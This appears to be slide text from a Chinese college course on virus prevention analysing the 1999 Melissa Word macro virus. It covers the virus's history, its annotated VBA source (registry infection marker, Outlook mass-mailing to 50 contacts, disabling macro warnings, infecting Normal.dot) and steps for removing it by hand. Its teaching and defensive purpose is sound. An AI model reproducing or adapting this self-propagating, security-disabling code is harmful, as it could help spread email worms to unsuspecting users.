计算机病毒电子3-3-2梅丽莎病毒剖析

Virus计算机病毒与防治重庆电子职业学院计算机病毒与防治课程小组教学单元3-3宏病毒防治梅丽莎病毒源码梅丽莎病毒特点梅丽莎病毒行为分析第二讲梅丽莎病毒剖析计算机病毒与防治课程小组梅丽莎病毒的手工清除梅丽莎病毒特点计算机病毒与防治课程小组病毒名称：梅丽莎,又称Macro.Word97.Melissa病毒类型：宏病毒危险级别：★★★★★影响系统Word97/Word2000 梅丽莎病毒简介梅丽莎病毒特点计算机病毒与防治课程小组“梅丽莎”病毒于1999年3月爆发，它伪装成一封来自朋友或同事的“重要信息”电子邮件。用户打开邮件后，病毒会让受感染的电脑向外发送50封携毒邮件。尽管这种病毒不会删除电脑系统文件，但它引发的大量电子邮件会阻塞电子邮件服务器，使之瘫痪。1999年4月1日，在美国在线的协助下，美国政府将史密斯捉拿归案。梅丽莎病毒简介梅丽莎病毒特点计算机病毒与防治课程小组2002年5月7日美国联邦法院判决这个病毒的制造者入狱20个月和附加处罚，这是美国第一次对重要的电脑病毒制造者进行严厉惩罚。在联邦法庭上，控辩双方均认定“梅丽莎”病毒造成的损失超过8000万美元，编制这个病毒的史密斯承认，他从AOL盗取了一个帐户名，并利用这个帐户到处传播宏病毒，最后他示认罪，认为电脑病毒是一个“巨大的错误”，自己的行为“不道德”。病毒制造者梅丽莎病毒特点计算机病毒与防治课程小组 该病毒通过电子邮件的方式传播,当用户打开附件中的“list.doc”文件时，将立刻中招。 病毒的代码使用Word的VBA语言编写,开创了此类病毒的先河,如同病毒作者的猖狂之言“It’sanewage!”。 病毒通过对注册表进行修改,并调用Outlook发送含有病毒的邮件,进行快速传播。由于该病毒发送的邮件的发件人是用户熟悉的,因此往往被很多人忽视。同时,该病毒会自动重复以上的动作,由此引起连锁反应,在短时间内,造成邮件服务器的大量阻塞,严重影响正常网络通讯。 该病毒可感染Word97、Word2000的Doc文件,并修改通用Normal.dot,使受害者几乎永无“脱离苦海”之时。梅丽莎病毒特点梅丽莎病毒源码分析计算机病毒与防治课程小组梅丽莎病毒巧妙地利用了VBA技术对注册表、Word模板和邮件系统进行了猛烈地攻击。1、梅丽莎病毒被激活后,将修改注册表中的“HKEY_CURRENT_USER\Software\Microsoft\office\”键,并增加项“Melissa？”,赋值为“…byKwyjibo”(病毒作者的大名)，并将此作为是否已感染病毒的标志。病毒中相关操作的核心代码如下所示：’读取注册表项的内容,进行判断IfSystem.PrivateProfileString(“”,“HKEY_CURRENT_USER\Software\Microsoft\office\”，“Melissa？”)<>“…byKwyjibo”Then……’其它操作代码’设置感染标志System.PrivateProfileString(“HKEY_CURRENT_USER\Software\Microsoft\office\”，“Melissa？”)=“…byKwyjibo”EndIf梅丽莎病毒源码分析计算机病毒与防治课程小组2、发送邮件在Outlook程序启动的情况下,梅丽莎病毒将自动给地址簿中的成员(前50名)发送邮件,主题为“ImportantMessageFrom”,用户名“<user>”为Word软件的用户名,邮件的正文为“Hereisthatdocumentyouaskedfor…don’tshowanyoneelse;一)”,邮件的附件为一个文件名为“list.doc”的带毒文件。为了实现七述功能,病毒利用获取了地址薄中所有的邮件地址,并发送内嵌病毒代码的邮件,达到了疯狂传播的目的。病毒中相关操作的核心代码如下所示：梅丽莎病毒源码分析计算机病毒与防治课程小组DimUngaDasOutlook,DasMapiName,BreakUmoffASlice’创建Outlook应用程序实例对象SetUngaDasOutlook=CreateObject(“Outlook.Application”)’获取MAPI对象SetDasMapiName=UngaDasOutlook.GetNameSpace(“MAPI”)IfUngaDasOutlook=”Outlook”ThenDasMapiName.Logon“profile”,”password”’遍历地址薄,进行邮件发送操作Fory=1ToDasMapiName.AddressLists.CountSetAddyBook=DasMapiName.AddressLists(y)X=1SetBreakUmoffASlice=UngaDasOutlook.CreateItem(0)Foroo=1ToAddyBook.AddressEntries.Count’获取第n个收件人地址Peep=AddyBook.AddressEntries(x)’加入收件人地址BreakUmoffASlice.Recipients.AddPeepX=x+1梅丽莎病毒源码分析计算机病毒与防治课程小组Ifx>50Thenoo=AddyBook.AddressEntries.CountNextoo’设置邮件的主题BreakUmoffASlice.Subject=”ImportantMessageFrom”&Application.UserName’设置邮件的正文BreakUmoffASlice.Body=”Hereisthatdocumentyouaskedfor…don’tshowanyoneelse:-)”’加入邮件的附件BreakUmoffASlice.Attachments.AddActiveDocument.FullName’发送邮件BreakUmoffASlice.SendNexty’断开连接DasMapiName.LogoffPeep=””EndIf梅丽莎病毒源码分析计算机病毒与防治课程小组3、修改Word模版梅丽莎病毒激活后,将感染Word97和Word2000的文档并修改通用模板Normal.dot,使感染后的Word运行时“宏”菜单项不能使用,并且导致Word软件对文件转换、打开带有宏的文件、Normal.dot遭到修改后都不会出现警告,使病毒的魔爪“天衣无缝”。最后,将病毒自身的代码和所做的设置修改,利用一个很高超的方法一同写入Normal.dot之中,使用户以后打开Word时病毒反复发作。病毒中相关操作的核心代码如下所示：梅丽莎病毒源码分析计算机病毒与防治课程小组’使“宏”工具栏的“安全”项无效CommandBars(“Macro”).Controls(“Security…”).Enabled=False’使“工具”菜单栏的“宏”项无效CommandBars(“Tools”).Controls(“Macro”).Enabled=False’将“0”(1-1)值赋于ConfirmConversions属性,使“文件转换”对话框不显示Options.ConfirmConversions=(1-1)’将,“0”（1-1）值赋于VirusProtection属性,使“宏警告”对话框不显示Options.VirusProtection=(1-1)’将“0”(1-1)值赋于SaveNormalPrompt属性,使Normal.dot被修改后不显示警告对话框Options.SaveNormalPrompt=(1-1)’获取当前文档的VBA工程的第1个模块名称SetADI1=ActiveDocument.VBProject.VBComponents.Item(1)’获取Normal.dot的VBA工程的第1个模块名称SetNTI1=NormalTemplate.VBProject.VBComponents.Item(1)NTCL=NTI1.CodeModule.CountOfLinesADCL=ADI1.CodeModule.CountOfLinesBGN=2梅丽莎病毒源码分析计算机病毒与防治课程小组‘如果当前文档未感染IfADI1.Name<>”Melissa”Then’修改VBA工程的第1个模块名称为“Melissa”IfADCL>0ThenADI1.CodeModule.DeleteLines1,ADCLSetToInfect=ADI1ADI1.Name=“Melissa“DoAD=TrueEndIf’如果Normal.dot未感染IfNTI1.Name<>“Melissa”Then’修改VBA工程的第1个模块名称为“Melissa“IfNTCL>0ThenNTI1.CodeModule.DeleteLines1,NTCLSetToInfect=NTI1NTI1.Name=”Melissa”DoNT=TrueEndIf梅丽莎病毒源码分析计算机病毒与防治课程小组’如果都已感染,跳转执行以后的命令IfDoNT<>TrueAndDoAD<>TrueThenGoToCY’开始感染Normal.dotIfDoNT=TrueThenDoWhileADI1.CodeModule.Lines(1,1)=””ADI1.CodeModule.DeleteLines1LoopToInfect.CodeModule.AddFromString(“PrivateSubDocument_Close（）”)DoWhileADI1.CodeModule.Lines(BGN,1)<>“”ToInfect.CodeModule.InsertLinesBGN,ADI1.CodeModule.Lines(BGN,1)BGN=BGN+1LoopEndIf*梅丽莎病毒源码分析计算机病毒与防治课程小组IfDoAD=TrueThen’开始感染当前文档DoWhileNTI1.CodeModule.Lines(1,1)=””NTI1.CodeModule.DeleteLines1LoopToInfect.CodeModule.AddFromString(“PrivateSubDocument.Open()”)DoWhileNTI1.CodeModule.Lines(BGN,1)<>””ToInfect.CodeModule.InsertLinesBGN,NTI1.CodeModule.Lines(BGN,1)BGN=BGN+1LoopEndIfCYA:’保存被修改的当前文档和Normal.dotIfNTCL<>0AndADCL=0And(InStr(1,ActiveDocument.Name,”Document”)=False)ThenActiveDocument.SaveAsFileName=ActiveDocument.FullNameElseIf(InStr(1,ActiveDocument.Name,”Document”)<>False)ThenActiveDocument.Saved=TrueEndIfEnfIf梅丽莎病毒主要行为分析计算机病毒与防治课程小组梅丽莎病毒源码梅丽莎病毒对注册表的修改梅丽莎病毒发出的邮件梅丽莎病毒手工清除计算机病毒与防治课程小组感染了梅丽莎病毒后，同样可以用最新的防治计算机病毒的软件来查杀，如果手头上一时没有病毒防治软件的话，对感染宏病毒的WORD文件也可以通过手工操作的方法来处理。（1）在Administrator用户下，打开我的电脑,选择“工具→文件夹选项→查看”,选中“显示系统文件夹的内容”和“显示所有文件和文件夹”选项,取消“隐藏受保护的操作系统文件”选项,确定后搜索NORMAL.DOT文件。注意在搜索时要将“更多高级选项”下的“搜索系统文件夹”和“搜索隐藏的文件和文件夹”都勾上,待搜索完毕后,将找到的NORMAL.DOT文件全部删除,并清空回收站.（2）打开注册表编辑器，搜索所有键名称为“Melissa”的项，全部删除。熊猫烧香病毒手工清除计算机病毒与防治课程小组（3）删除所有染毒WORD文件，如果需要保留某个文件中的内容，选中该文件,单击鼠标右键选择“打开方式”,在程序选择框选择“写字板”打开文件,然后另存为DOC文件。或者在高版本的WORD软件中打开文件清除里面的宏处理。（4）最后新建一个Word空文档并打开,倘若没有报错而且Word中各功能项可用,则Word可以正常使用了。本讲小结梅丽莎病毒特点梅丽莎病毒源码分析梅丽莎主要行为分析具有典型宏病毒行为分析能力反病毒能力计算机病毒与防治课程小组梅丽莎病毒手工清除Virus*